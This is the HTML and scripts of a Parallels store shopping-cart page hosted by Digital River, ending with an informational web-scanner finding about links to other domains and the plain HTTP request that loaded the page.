<div id="dr_orderNumber">
<p>
<strong>Reference Number:</strong>..7154200626</p>
</div>
<div id="dr_shoppingCartTable">
<table id="dr_cartTbl" summary="This table contains your Shopping Cart information">
<thead>
<tr>
<th scope="col" class="dr_productName">Product Name</th>
<th class="dr_qty" scope="col">Qty</th>
<th class="dr_deliveryMethod" scope="col">Delivery</th>
<th class="dr_price">Price</th>
<th class="dr_remove" scope="col">remove</th>
</tr>
</thead>
<tbody>
<tr class="dr_oddRow">
<td scope="row" class="dr_productName">
<a target="_blank" href="/store/para/en_US/DisplayPage/id.ProductInterstitialDetailsPage/productID.222100500" onclick="popUp(this.href,'productDetail',450,400);return false;" lineItemID="5217905926">Parallels Small Business Panel for Windows - 1 User</a>
</td>
<td class="dr_qty">
<input type="hidden" name="ORIG_VALUE_lineItemID$$1001" value="5217905926"/>
<input name="lineItemID$$1001" value="5217905926" type="hidden"/>
<span class="dr_error">
<!--..-->
</span>
<input type="hidden" name="ORIG_VALUE_quantity$$1001" value="11"/>
<input name="quantity$$1001" value="11" size="2" class="dr_qtyInput" type="text"/>
<input type="image" class="dr_refreshQtyImage" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/para/cm/buttons/button_update.gif" alt="update" title="update"/>
</td>
<td class="dr_deliveryMethod" scope="row"/>
<td scope="row" class="dr_price">$440.00</td>
<td class="dr_remove" scope="row">
<a class="dr_deleteItemLink" href="/store/para/en_US/RemoveItemFromRequisition/lineItemID.5217905926/nextAction.DisplayThreePgCheckoutShoppingCartPage" title="remove" rel="nofollow">
<img class="dr_deleteItemImage" border="0" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/para/cm/buttons/removex2new.gif" alt="remove"/>
</a>
</td>
</tr>
<tr>
<td colspan="5" class="dr_backUpCD">
<div class="bucket-noheader-container">
<div class="bucket-top">
<span/>
</div>
<div class="bucket-borders">
<div class="bucket-noheader-content">
<div class="candy">
<h2 class="hdr-alpha">
<span id="dr_candyRackHeader" class="dr_subHeader">
<em>
                                                           We also recommend:
                                                       </em>
</span>
</h2>
</div>
</div>
</div>
<div class="bucket-btm">
<span>..</span>
</div>
</div>
</td>
</tr>
<tr>
<td colspan="3" class="dr_couponCode">
<label for="promoCode">Promo Code:</label>
<input type="hidden" name="ORIG_VALUE_popName" value="PointOfSale_CouponEntryField"/>
<input name="popName" value="PointOfSale_CouponEntryField" type="hidden"/>
<input type="hidden" name="ORIG_VALUE_couponCode" value=""/>
<input name="couponCode" value="" type="text" size="10" id="promoCode"/>
<input type="image" class="dr_button" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/para/cm/buttons/button_apply.gif"/>
</td>
<td colspan="2" class="dr_updateBtn"/>
</tr>
<tr id="dr_cartTotals">
<td colspan="3"/>
<td id="dr_totals" colspan="2">
<table width="100%" cellpadding="0" cellspacing="0" border="0">
<tr id="dr_priceTotal">
<td class="dr_price dr_totals">Total: $440.00</td>
</tr>
</table>
</td>
</tr>
</tbody>
</table>
</div>
<input type="image" class="dr_refreshQtyImage" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/para/cm/buttons/button_update.gif" alt="update" title="update"/>
<div id="dr_siteButtons">
<div id="dr_continueShoppingButton">
<a class="dr_button" href="/store/para/en_US/ContinueShopping">
<img border="0" alt="continue shopping" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/para/cm/buttons/button_continueShopping.gif"/>
</a>
</div>
<div id="dr_checkoutButton">
<a class="dr_button" href="https://store.parallels.com/store/para/en_US/DisplayThreePgCheckoutAddressPaymentInfoPage">
<img border="0" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/para/cm/buttons/button_checkout.gif" alt="checkout"/>
</a>
</div>
</div>
<div id="creditCardLogos">
<img alt="Accept Credit Cards" src="/DRHM/Storefront/Site/para/cm/images/payment-methods2.gif"/>
</div>
<p id="dr_cartPricingDisclaimer" class="dr_clearBoth">Prices and offers in the cart are subject to change until the order is submitted.</p>
<div id="dr_TCFooter"><div id="dr_overlay_wrapper" style="position:absolute;width:687px;height:383px;display:none;"><table border="0" cellspacing="0" cellpadding="0" id="dr_overlay_table"><tr><td class="dr_overlay_table_top_left">&nbsp;</td><td class="dr_overlay_table_top_middle">&nbsp;</td><td class="dr_overlay_table_top_right">&nbsp;</td></tr><tr><td class="dr_overlay_table_left">&nbsp;</td><td class="dr_overlay_table_middle"><div id="dr_overlay_header"><div id="dr_overlay_close_window"><a href="#" title="Close Window"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/para/paraSI/version/45/images/close_en_US.gif" align="right" alt="Close Window" border="0"/></a></div><div id="dr_overlay_logo"><a href="/store/defaults/en_US&id=DRAboutDigitalRiverPage" target="DrOverlayIframe"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/images/dr_logo_0209.gif" width="115" height="27" alt="Digital River" border="0"></a></div><div class="dr_overlay_clearit"><!-- --></div><div id="dr_overlay_nav"><ul id="dr_overlay_tabs"><li class="dr_overlay_about_digital_river"><a id="ContactInformationLink" href="/store/defaults/en_US/DisplayDRAboutDigitalRiverPage" target="DrOverlayIframe">About Digital River, Inc.</a></li><li class="dr_overlay_privacy_policy"><a id="PrivacyPolicyLink" href="/store/defaults/en_US/DisplayDRPrivacyPolicyPage" target="DrOverlayIframe">Privacy Policy</a></li><li class="dr_overlay_terms_and_conditions"><a id="TermsAndConditionsLink" href="/store/defaults/en_US/DisplayDRTermsAndConditionsPage" target="DrOverlayIframe">Terms of Sale</a></li><li class="dr_overlay_print"><a href="#"><img border="0" src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/para/paraSI/version/45/images/icon_printer.gif" alt="Print"/></a></li></ul><!-- /#dr_overlay_tabs --></div><div class="dr_overlay_clearit"><!-- --></div></div><!-- /#dr_overlay_header --><iframe name="DrOverlayIframe" src="javascript:false" width="665" height="300" scrolling="auto" frameborder="0" marginheight="0" marginwidth="0"></iframe></td><td class="dr_overlay_table_right">&nbsp;</td></tr><tr><td class="dr_overlay_table_bottom_left">&nbsp;</td><td class="dr_overlay_table_bottom_middle">&nbsp;</td><td class="dr_overlay_table_bottom_right">&nbsp;</td></tr></table></div><!-- /#dr_overlay_wrapper --><script type="text/javascript">if (!window.jQuery) {document.writeln('<scr'+'ipt type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/jquery-1.3.2.min.js"></scr'+'ipt>');}</script><script type="text/javascript">(function($){$(window).load(function(){if ($.boxModel || ($.support && $.support.boxModel)) {$('head').append('<link rel="stylesheet" href="//drh2.img.digitalriver.com/DRHM/Storefront/Library/content/css/drtc_overlay.base.css" type="text/css"/>');var msie = navigator.userAgent.match(/MSIE (\d+)/);var ie6 = false;var dataOK = true;if (msie) {var ver = parseInt(msie[1]);if (ver < 8) {dataOK = false;if (ver < 7) {ie6 = true;$('head').append('<link rel="stylesheet" href="//drh1.img.digitalriver.com/DRHM/Storefront/Library/content/css/drtc_overlay.IE6.css" type="text/css"/>');}else {$('head').append('<link rel="stylesheet" href="//drh2.img.digitalriver.com/DRHM/Storefront/Library/content/css/drtc_overlay.IE7.css" type="text/css"/>');}}}else if (/Firefox\/3\.5/.test(navigator.userAgent)) {dataOK = false;}if (dataOK) {$('head').append('<link rel="stylesheet" href="//drh1.img.digitalriver.com/DRHM/Storefront/Library/content/css/drtc_overlay.data.css" type="text/css"/>');}var overlaySetup = function(){var footerLinkSelector = 'a.dr_aboutDigitalRiver,a.dr_privacyPolicy,a.dr_termsAndConditions';$(footerLinkSelector).removeAttr('onclick');$('#dr_overlay_wrapper').overlay({fixed: !ie6,modal: {css: {backgroundColor: '#FFF'}},showSelector: footerLinkSelector,hideSelector: '#dr_overlay_close_window > a[href="#"]',onShow: function(bgOverlay, footerLink){var iframeOverlay = this;$(bgOverlay).fadeIn('normal', function(){if (ie6) {self.scrollTo(0, 0);}$(iframeOverlay).slideDown('slow');});$('iframe', this).one('load', function(){$(this).css('visibility', 'visible');});parent.frames[footerLink.target].location.replace(footerLink.href);return false;},onHide: function(bgOverlay){$(this).hide();$(bgOverlay).fadeOut('normal');return false;}}).find('li.dr_overlay_print > a[href="#"]').click(function(){if (window['DrOverlayIframe']) {window['DrOverlayIframe'].focus();window['DrOverlayIframe'].print();}}).end().find('#dr_overlay_logo > a,li.dr_overlay_about_digital_river > a,li.dr_overlay_privacy_policy > a,li.dr_overlay_terms_and_conditions > a').click(function(){parent.frames[this.target].location.replace(this.href);return false;});};if ($.fn.overlay) {overlaySetup();}else {$.ajax({url: '//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/plugins/jquery.overlay-1.1.min.js',dataType: 'script',cache: true,global: false,success: overlaySetup});}}});})(jQuery);</script><p><a class="dr_aboutDigitalRiver" href="/store/defaults/en_US/DisplayDRAboutDigitalRiverPage/eCommerceProvider.Digital+River+Inc." onclick="popUp(this.href,'aboutDigitalRiver',400,400);return false;" target="DrOverlayIframe">Digital River Inc.</a> is the authorized reseller and merchant of the products and services offered within this store.</p><p><a class="dr_privacyPolicy" href="/store/defaults/en_US/DisplayDRPrivacyPolicyPage/eCommerceProvider.Digital+River+Inc." onclick="popUp(this.href,'privacyPolicy',660,400);return false;" target="DrOverlayIframe">Privacy Policy</a>&nbsp;&nbsp;&nbsp;<a class="dr_termsAndConditions" href="/store/defaults/en_US/DisplayDRTermsAndConditionsPage/eCommerceProvider.Digital+River+Inc." onclick="popUp(this.href,'termsAndConditions',630,400);return false;" target="DrOverlayIframe">Terms of Sale</a>&nbsp;&nbsp;&nbsp;</p></div>
</form>
</div>
</div>




<script type="text/javascript">
// Called via onchange from shipping dropdown
function changeEstimatedShipping(zoneList, optionList, shippingForm) {
if (zoneList.selectedIndex !== 0) {
shippingForm.shippingOptionID.value = optionList.options[optionList.selectedIndex].value;
shippingForm.country.value = zoneList.options[zoneList.selectedIndex].value;
q = false;
shippingForm.submit();
}
}
// fireclick
var fc_track = "shopping_cart";





/* View */
               var fc_prod_view = "";





</script>


</span><!-- /.opDefaultContent -->
<script type="text/javascript">
ptomodule.displayModule('para_ThreePgCheckoutShoppingCartPage_contentBody');
</script>
















<!-- popUp overlay tags -->
<div class="popup_window_wrapper" style="display:none;position:absolute;">
<div class="popup_window_title_bar_wrapper">
<div class="popup_shadow9"></div>
<div class="popup_title_bar">
<h1 class="popup_title_header"></h1>
<div class="popup_close_button_wrapper">
<div class="popup_button_cover"><a href="#" class="popup_close_button_link" title="Close Window"><img class="popup_close_button" src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/para/paraSI/version/45/images/close_en_US.gif" alt="Close Window" border="0"/></a></div>
<div class="popup_title_fade"></div><div class="popup_clear_it"><!-- --></div>
</div><!-- /.popup_close_button_wrapper -->
</div><!-- /.popup_title_bar -->
<div class="popup_shadow1"></div>
<div class="popup_clear_it"><!-- --></div>
</div><!-- /.popup_window_title_bar_wrapper -->
<div class="popup_middle_wrapper">
<div class="popup_left_shadow_wrapper"><div class="popup_shadow8"></div><div class="popup_shadow7"></div></div><!-- /.popup_left_shadow_wrapper -->
<div class="popup_content_wrapper"><iframe class="popup_content_iframe" src="javascript:false;" scrolling="auto" frameborder="0">Loading...</iframe></div>
<div class="popup_right_shadow_wrapper"><div class="popup_shadow2"></div><div class="popup_shadow3"></div></div><!-- /.popup_right_shadow_wrapper -->
<div class="popup_clear_it"><!-- --></div>
</div><!-- /.popup_middle_wrapper -->
<div class="popup_bottom_bar_wrapper"><div class="popup_shadow6"></div><div class="popup_shadow5"></div><div class="popup_shadow4"></div><div class="popup_clear_it"><!-- --></div></div><!-- /.popup_bottom_bar_wrapper -->
</div><!-- /.popup_window_wrapper -->










<script type="text/javascript">
//if (pageNameFlag=='confirmOrderPage') {
//$('#dr_shipMethod').change(onShippingMethodChange);
//}

if (pageNameFlag=='quickBuyCartPage') {
$("#shippingDifferentThanBilling").click( function(){
$("#dr_shippingContainer").toggle();
});
}
</script>



<script type="text/javascript">
// Function to hide/show info
function hideText(id) {
jQuery('#'+id).toggle();
}
// Function to disable submit button after it has been clicked once already to prevent multiple order submission on CheckoutPayment and ConfirmOrder
function disableButton(button) {
//jQuery(button).hide();
}
// Pull in the overlay verison of popUp on DOM-ready, which will overwrite the old-school function above
if (top === self) { // Don't pull in this code if we're already in a pop-up (iframe)
jQuery(function(){


// Pull in the main CSS for the popUp overlay
       
jQuery.get('/store/para/en_US/DisplayPage/id.TopHeaderPopUpCssStylePage', function(popUpStyle){
jQuery('head').append(popUpStyle);
}, 'html');

// Include browser-specific components
var dataOK = true;
var msie = navigator.userAgent.match(/MSIE (\d+)/);
if (msie) {
var ieVer = parseInt(msie[1]);
if (ieVer < 8) {
dataOK = false;
if ((ieVer < 7) && !jQuery.fn.overlay) { // Include the overlay plugin for IE6
jQuery.ajax({url: '//drh2.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/plugins/jquery.overlay.min.js', dataType: 'script', cache: true, global: false});
}
}
}
else if (/Firefox\/3\.5/.test(navigator.userAgent)) {
dataOK = false; // FF 3.5 bug #477118
}
// Pull in the draggable popUp overlay script
jQuery.ajax({url: '//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/plugins/jquery.draggable.popUp.min.js', dataType: 'script', cache: true, global: false});
// Use embedded data: images for the shadows, if the browser can handle it
if (dataOK) {
jQuery('head').append('<link rel="stylesheet" type="text/css" href="//drh2.img.digitalriver.com/DRHM/Storefront/Library/content/css/PopUp.Shadows.data.css"/>');
}
});
}
</script>



































<script type="text/javascript">
// Show the links that will allow the details to be expanded
jQuery(function(){
jQuery('#shippingDifferentThanBillingIndicator,span.dr_expandDetails').show().find('[data-expand-section]').click(function(){
jQuery('#'+jQuery(this).attr('data-expand-section')).toggle();
return !(this.href);
}).click();
});
$('#dr_ExtendedDownloadServiceOffer .dr_button, #dr_BackUpCDOffer .dr_button').click( function() {
$(this).css('visibility','hidden');
});
</script>








<!--!esi:include src="/esi?SiteID=para&StyleID=26770400&StyleVersion=58&styleIncludeFile=body-section2.html"-->
</div></td>
</tr>
<tr>
<td id="copyright"><div class="left">&copy; 1999-2011 Parallels, Inc. All rights reserved.</div><div class="right"></div></td>
</tr>
</table>
<script type="text/javascript">
   var errorMssgs = [];
   $('.dr_error').each(function(i) {
       errorMssgs[i] = $(this).html();
   });
   for (i=0;i<errorMssgs.length;i++) {
       if (errorMssgs[i].indexOf('Enter a valid value') > -1) {
        $('#dr_ThreePgCheckoutAddressPaymentInfo p.dr_requiredFieldsInfo').before('<p id="topError" style="color:red; font-size:12px; font-weight:bold;">Sorry, we have encountered an error. Please check that you have filled in everything correctly below.</p>');
           break;
       }
   }
</script>

<script type="text/javascript">
fc_track = (typeof(fc_track) === 'undefined') ? null : fc_track;
$(function () {
   function op_ChangeBreadcrumbs(argCurrentStep) {
if (argCurrentStep === 'billing') {
$("#stepOne").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step1_cart1_off.jpg");
$("#stepTwo").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step2_billing_on.jpg");
} else if (argCurrentStep === 'review') {
$("#stepOne").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step1_cart1_off.jpg");
$("#stepTwo").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step2_billing_off.jpg");
$("#stepThree").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step3_verify_on.jpg");
} else if (argCurrentStep === 'thank_you') {
$("#stepOne").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step1_cart1_off.jpg");
$("#stepTwo").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step2_billing_off.jpg");
$("#stepThree").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step3_verify_off.jpg");
$("#stepFour").attr("src", "//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/images/bc_step4_complete_on.jpg");
}
   }
op_ChangeBreadcrumbs(fc_track);
});
</script>

<script>
// Added by J D April 2010 to customize site
//Updated by J J 5/27/2010 - 8/2010
// Floating security Cert to the right
$('div#dr_geoTrustIcon').css('float','right');
$('div#dr_geoTrustIcon a').css('float','right').css('text-align','right'); //for IE
$('div#dr_geoTrustIcon a img').css('float','right').css('text-align','right'); //for IE

// Re-labelling and repositioning the Upsell Interstitial "Continue" (with purchase) link and
// Re-labelling and repositioning the Upsell Interstitial "Upgrade" button
$('#dr_productUpSell form div#dr_siteButtons').replaceWith('<div id="acceptOfferInput"><input class="dr_acceptOffer" type="submit" value="Upgrade your purchase"/></div><div id="origPurchCont"><a href="/store/para/en_US/DisplayShoppingCartPage">Continue with original purchase</a></div>');

//Remove text from Upsell
$('#dr_productUpSell h1').hide('');
//$('#dr_productUpSell #dr_offer ul li div.dr_product img').hide('');
//$('#dr_productUpSell h2').hide('');
$('#dr_productUpSell #dr_offer ul li div.dr_price').hide('');

// Changing the Continue Shopping Button Text
$('#dr_continueShoppingButton a.dr_button').css('background-color','#ffffff').css('font-size','10px').css('color','#0857A6').css('text-decoration','underline').css('float','left');
$('#dr_continueShoppingButton a.dr_button').html('&#60;&#60; Continue Shopping');

// Floating Credit Cards to the right
$('#creditCardLogos').css('float','right');

// Making Cart Total Bigger
$('td#dr_totals table tr#dr_priceTotal td.dr_price').css('font-size','12px').css('font-family','verdana');

// Removing text breadcrumbs
$('#dr_CheckoutBreadcrumb').hide('');

// Removing link from Product Name
$('#dr_ThreePgCheckoutShoppingCart td.dr_productName a[href!="/store/para/en_US/DisplayPage/id.ExtendedDownloadServiceMerchInfoPage"]').each(function(index) {
$(this).wrap("<span class='dr_productInfo'>"+$(this).html()+"</span>").remove();
});
// Adding rounded borders to Account Login Header
$('#dr_loginContainer h3').replaceWith('<table width="100%" class="loginTable" border="0"><tr><td class="leftRound">Account Login Information</td><td class="rightRound"></td></tr></table>');

// Adding rounded borders to Billing Info Header
$('#dr_billingContainer h3').replaceWith('<table width="100%" class="loginTable" border="0"><tr><td class="leftRound">Billing Information</td><td class="rightRound"></td></tr></table>');

// Adding rounded borders to Additional Info Header
$('#dr_optInContainer h3').replaceWith('<table width="100%" class="loginTable" border="0"><tr><td class="leftRound">Additional Information</td><td class="rightRound"></td></tr></table>');

// Adding rounded borders to Payment Info Header
$('#dr_paymentContainer h3').replaceWith('<table width="100%" class="loginTable" border="0"><tr><td class="leftRound">Payment Information</td><td class="rightRound"></td></tr></table>');

// Styling Gray Headers
$('.loginTable').css('background-color','#a0a0a4').css('height','26px');
$('td.leftRound').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/leftroundcorner_v2.gif)').css('background-repeat','no-repeat').css('background-position','left').css('height','26px').css('font-family','verdana').css('font-size','13px').css('font-weight','bold').css('color','#fff').css('background-color','#a0a0a4');
$('td.rightRound').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/rightroundcorner_v2.gif)').css('background-repeat','no-repeat').css('background-position','right').css('height','26px').css('width','10px');

// Changing add buttons on Thank You Page
$('#dr_thankYouElementContainer .addOnOffer').css('height','25px');

// Remove refresh button on Quantity
$('#dr_shoppingCartTable input.dr_refreshQtyImage').remove('');

// Styling sub-Cart refresh button
$('input.dr_refreshQtyImage').css('float','right').css('margin','10px 0px 10px 0px');

// Remove remove header
$('th.dr_remove').html('');

// Float the Currency Selector to the right, move it up higher
$('#dr_currencySelector').css('right','10px').css('position','absolute').css('top','10px');

// Float the Checkout Button to the right, move it up higher
$('#dr_checkoutButton').css('right','0px').css('position','absolute').css('top','48px');

// Style the "Estimated Shipping" header
$('div#dr_shippingEst h3.shippingEst').css('background-color','#e6e6e6').css('padding','3px 0px 3px 10px');

// Centering Disclaimer and Changing Font
$('p#dr_cartPricingDisclaimer').css('font-size','11px').css('color','#565656').css('font-family','verdana').css('text-align','center');
$('div#dr_TCFooter').css('font-size','11px').css('color','#565656').css('font-family','verdana').css('text-align','center');

// Adding horizontal rule above the disclaimer
$('<div id="horizontalRule"><hr width="60%" color="#e5e5e5"></div>').insertBefore('p#dr_cartPricingDisclaimer');
$('#horizontalRule').css('width','100%').css('text-align','center').css('margin-top','80px').css('margin-bottom','5px');

// Login Button on Billing Page
$('input#dr_cc_login').css('background-color','#ffffff').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/continueButton.jpg)').css('background-repeat','no-repeat').css('width','77px').css('height','25px');

// Check box to opt-IN for en_US locale
$('#dr_optInEmail div.dr_formLine').replaceWith('<div class="dr_formLine"><label for="optIn" class="dr_label">We would like to keep you informed via email about product updates, upgrades, special offers and pricing. If you do not wish to be contacted via email, please ensure that the box is not checked.</label><input type="hidden" value="on" name="ORIG_VALUE_optIn"/><input type="checkbox" checked="checked" value="on" name="optIn"/></div>');

// Continue Button on Billing Page
$('input#checkoutButton').css('background-color','#ffffff').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/checkoutButton.jpg)').css('background-repeat','no-repeat').css('width','88px').css('height','23px');

// Top Submit Button on Verify Order Page
$('input#submitTop').css('background-color','#ffffff').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/checkoutButton.jpg)').css('background-repeat','no-repeat').css('width','115px').css('height','23px');

// Bottom Submit Button on Verify Order Page
$('input#submitBottom').css('background-color','#ffffff').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/checkoutButton.jpg)').css('background-repeat','no-repeat').css('width','115px').css('height','23px');

// Change Delivery Method to Delivery
$('table#dr_confirmTbl th.dr_deliveryMethod').html('Delivery');

// Remove border from dr_Content Table on Verify Order Page
$('table.dr_confirmTable').css('border','0px');

// Adding border to the Table
$('#dr_cartTbl > tbody > tr > td:first-child').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/lightGreyPixel.gif)').css('background-repeat','repeat-y');
$('#dr_cartTbl > tbody > tr > td:last-child').css('border-right','1px solid #e5e5e5');
// $('#dr_cartTbl > tbody > tr:last-child > td').css('border-bottom','1px solid #e5e5e5');
$('<tr><td colspan="5" style="padding:0; margin:0"><table width="100%" border="0" class="bottomCurveTable"><tr><td class="leftRoundBottom" width="12" style="background-image:url(/DRHM/Storefront/Site/para/cm/images/leftRoundBottom_v2.gif);background-repeat:no-repeat;background-position:0 0;height:9px;width:12px"></td><td class="middleLineBottom" style="background-image:url(/DRHM/Storefront/Site/para/cm/images/middleLineBottom.gif);background-repeat:repeat-x"></td><td class="rightRoundBottom" width="12" style="background-image:url(/DRHM/Storefront/Site/para/cm/images/rightRoundBottom_v2.gif);background-repeat:no-repeat;background-position:top right;height:9px;width:12px"></td></tr></table></td></tr>').appendTo('table#dr_cartTbl');

// Reposition the "Order Number" field on the Invoice page
$('<br /><br />').insertBefore('#dr_Invoice span#dr_orderNumber'); // drop below the order date
$('<br />').insertBefore('#dr_Invoice div#dr_billingAddress');// add space between Ord num and bill addr

// Remove the parallels.com cs email link and form
$("#dr_TechnicalAssistance p:contains('parallels.us.cs@digitalriver.com')").remove();
$("#dr_technicalSupportSection p:contains('parallels.us.cs@digitalriver.com')").remove();
$("#dr_DownloadInformation p:contains('parallels.us.cs@digitalriver.com')").remove();
$("#dr_technicalSupportSection p:contains('OR')").remove();
$("#dr_contactFormSection").remove();

// Replace Payment Method dd on Order Info page
$('#dr_OrderInformation dl div.dr_q2 dd').replaceWith('<dd>We accept Visa&#174;, MasterCard&#174;, EuroCard, Discover&#174;, American Express&#174;, and Diner\'s Club&#174;, as well as PayPal, check cards and ATM cards if they are issued by one of these major credit card companies. We also accept checks, money orders, and wire transfers. If you choose to pay by check, money order, or wire transfer, you will receive instructions on how to send your payment once you submit your order.<p>Our servers encrypt all information submitted to them, so you can be confident that your credit card information will be kept safe and secure.</p></dd>');
// Remove "How do I start a new order?" from "Need Help?" page
$('#dr_Help #dr_helpColumnLeft #dr_orderInformationFAQ ul li.dr_q12').remove();
// Remove "How do I start a new order?" from Order Info page
$('#dr_OrderInformation dl div.dr_q12').remove();
// Replace "Can I order without a credit card?" dd on Order Info page
$('#dr_OrderInformation dl div.dr_q7 dd').replaceWith('<dd>Yes. In addition to credit cards we accept checks, PayPal, money orders and wire transfers. If you choose to pay by check, money order, or wire transfer, you will receive instructions on how to send your payment once you submit your order. </dd>');

// Change Refund Request URL on "Returns and Cancellations" page
$('#dr_ReturnAndCancellations dl div.dr_q3 dd').replaceWith('<dd>To request a refund, go to <a href="http://www.parallels.com/support" target="_blank">www.parallels.com/support</a>.</dd>');

//Updated Backup CD addon button on shopping cart page

$("#dr_ThreePgCheckoutShoppingCart div.addonDetailsButton a img, div.dr_candyRackChildProduct img.dr_buttonCandyRack").attr("src", "/DRHM/Storefront/Site/para/cm/images/Add_4.gif");

$('#dr_ProductDetails #dr_socialNetworkLinks').hide();

$('div.dr_candyRackChildProduct').insertAfter('h2.hdr-alpha');

</script>

<!--!/esi:include -->











<span class="opDefault" id="opmodule_para_bodyBottom"></span>
<script type="text/javascript">
ptomodule.displayModule('para_bodyBottom');
</script>









<script type="text/javascript">
var s_account = 'swsdev';
var omnChannel,omnProp2,omnProp4,omnEvents,omnProducts,omnState,omnZip,omnPurchaseID;
var omnPageName='ThreePgCheckoutShoppingCartPage';

</script>



<script type="text/javascript">
function omnitureProducts(prodString) { // convert FC string to Omniture string
rExp = /,/g;
rExp2 = /\?/g;
prodStringDelimiter = prodString.replace(rExp, ',;');
prodStringSeparator = prodStringDelimiter.replace(rExp2, ';');
s_products = ';'+prodStringSeparator;
return s_products;
}
omnPageName='Checkout: Shopping Cart';
omnChannel='Checkout';
omnProp2='Checkout: Shopping Cart';
omnProp4='Checkout';
omnEvents='scView';
if (typeof fc_prod_remove != 'undefined'){
omnProducts=omnitureProducts(fc_prod_remove);
omnEvents='scRemove';
}
if (typeof fc_prod_add != 'undefined'){
omnProducts=omnitureProducts(fc_prod_add);
omnEvents='scAdd';
}
if (typeof fc_prod_open != 'undefined'){
omnProducts=omnitureProducts(fc_prod_add);
omnEvents='scOpen,scAdd';
}
if (typeof fc_prod_view != 'undefined'){
omnEvents='scView';
}
</script>











   







<script type="text/javascript">

















































</script>
















   
   



   


       <script type="text/javascript">(function(){var cfsTrack = function(){setTimeout(function(){var img = new Image(1,1);img.src = '//7154200626---0---globalCommerce---0---173-193-214-243.cfspx.digitalriver.com/images/cleardot.gif';}, 100);};if (window.attachEvent) {window.attachEvent('onload', cfsTrack);} else {window.addEventListener('load', cfsTrack, false);}})();</script><noscript><img src="//7154200626---0---globalCommerce---0---173-193-214-243.cfspx.digitalriver.com/images/cleardot.gif" height=1 width=1 alt="" border="0" /></noscript>








<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/multimedia/Omniture/s_code_20102010.js"></script>
<script type="text/javascript">









</script>
<script type="text/javascript">
       s.pageName=omnPageName
       if (omnChannel) s.channel= omnChannel
       s.currencyCode='USD'
       s.charSet='UTF-8'
       if (omnProp4) s.pageType= omnProp4 // Page Type
       /* Traffice Variables */
       if (omnProp2) s.prop2= omnProp2 //Category
       if (omnProp4) s.prop4= omnProp4 // Page Type
       /* Conversion Variables */
       if (omnState) s.state= omnState
       if (omnZip) s.zip= omnZip
       if (omnEvents) s.events = omnEvents
       if (omnProducts) s.products= omnProducts
       if (omnPurchaseID) s.purchaseID = omnPurchaseID
       /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
       var s_code=s.t();if(s_code)document.write(s_code)
</script>













<!-- ################################ -->
<!-- ### BEGIN Google Custom, TOP ### -->
<script type="text/javascript">
   var _gaq = _gaq || [];

   _gaq.push(['_setAccount', 'UA-363966-1']);
   _gaq.push(['_setDomainName', '.parallels.com']);
   _gaq.push(['_setAllowHash', false]);
   _gaq.push(['_trackPageview']);

   (function() {
       var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
       ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';

       var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
   })();
</script>
<!-- ### END Google Custom, TOP ### -->
<!-- ################################ -->



<script type="text/javascript">
/* <![CDATA[ */
var google_conversion_id = 1067174464;
var google_conversion_language = "en_US";
var google_conversion_format = "3";
var google_conversion_color = "666666";
var google_conversion_label = "g5WWCMyrvQEQwJTv_AM";
var google_conversion_value = 0;
/* ]]> */
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
<noscript>
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="https://www.googleadservices.com/pagead/conversion/1067174464/?label=g5WWCMyrvQEQwJTv_AM&amp;guid=ON&amp;script=0"/>
</div>
</noscript>




   <!-- Thank You page and Your Order is Being Processed Page -->

   
       
   


<!-- begin retargeting pixel -->



<script src="http://display.digitalriver.com/?aid=244" type="text/javascript" defer="defer"></script>


<!-- end retargeting pixel -->













</body>
</html>
3.2. http://store.parallels.com/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.parallels.com
Path:   /store

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage HTTP/1.1
Host: store.parallels.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/store/small-business-panel/windows/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
